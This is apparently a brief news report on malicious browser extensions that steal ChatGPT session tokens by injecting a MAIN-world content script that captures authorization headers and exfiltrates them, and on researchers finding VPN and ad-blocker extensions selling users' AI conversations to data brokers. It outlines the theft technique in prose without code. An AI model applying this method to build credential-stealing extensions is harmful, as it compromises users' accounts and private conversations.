The tools were designed to intercept users' ChatGPT session authentication tokens and send them to a remote server, but they don't exploit ChatGPT vulnerabilities to do so. Instead, they inject a content script into chatgpt.com and execute it in the MAIN JavaScript world. The script monitors outbound requests initialized by the web application, to identify and extract authorization headers and send them to a second content script, which exfiltrates them to the remote server.
Browser extensions that promise privacy are found to be selling AI conversations from millions of users. Security researchers at Koi Security discovered that popular VPN and ad blocker extensions are secretly intercepting all conversations with ChatGPT, Claude, and Gemini and reselling them to data brokers. Security researcher Idan Dardikman discovered the problem after wondering if anyone could read his private conversations with AI assistants.